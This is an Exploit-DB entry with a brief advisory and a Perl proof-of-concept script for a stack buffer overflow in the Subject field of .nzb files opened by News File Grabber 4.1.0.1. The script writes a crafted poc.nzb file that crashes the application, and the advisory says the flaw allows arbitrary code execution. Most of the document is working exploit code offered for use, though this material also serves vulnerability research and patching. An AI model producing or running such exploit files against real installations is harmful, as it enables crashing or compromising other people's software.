News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)

EDB-ID:

29617




Platform:

Windows

Date:

2007-02-19


source: https://www.securityfocus.com/bid/22617/info

News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.

This issue affects version 4.1.0.1; other versions may also be affected. 

#!/usr/bin/perl
# ===============================================================================================
#                News File Grabber Subject Line Stack Buffer Overflow perl exploit 
#                               By Parveen vashishtha (parveen_vashishtha@yahoo.com)
# ==============================================================================================          
# Reference : https://www.securityfocus.com/bid/22617
#
# 
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing a newline char it crashes
# So here you go.
# 
#================================================================================================

use strict;

my($file_header)="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n".
			"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n".
			"<!-- NZB Generated by Parveen Vashishtha -->\n".
			"<nzb xmlns=\"http://www.google.com\">\n\n";

my($file_end)="</segment>\n".
"</segments>\n".
"</file>\n".
"</nzb>\n";


open(OUTPUTFILE, ">poc.nzb");                        # Crafted .NZB file 
 
print OUTPUTFILE $file_header;                       # Writing Header

print OUTPUTFILE "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";    # Vulnerable SUBJECT parameter

print OUTPUTFILE "\\n";

print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";
print OUTPUTFILE $file_end;                                     # End of file


close(OUTFILE);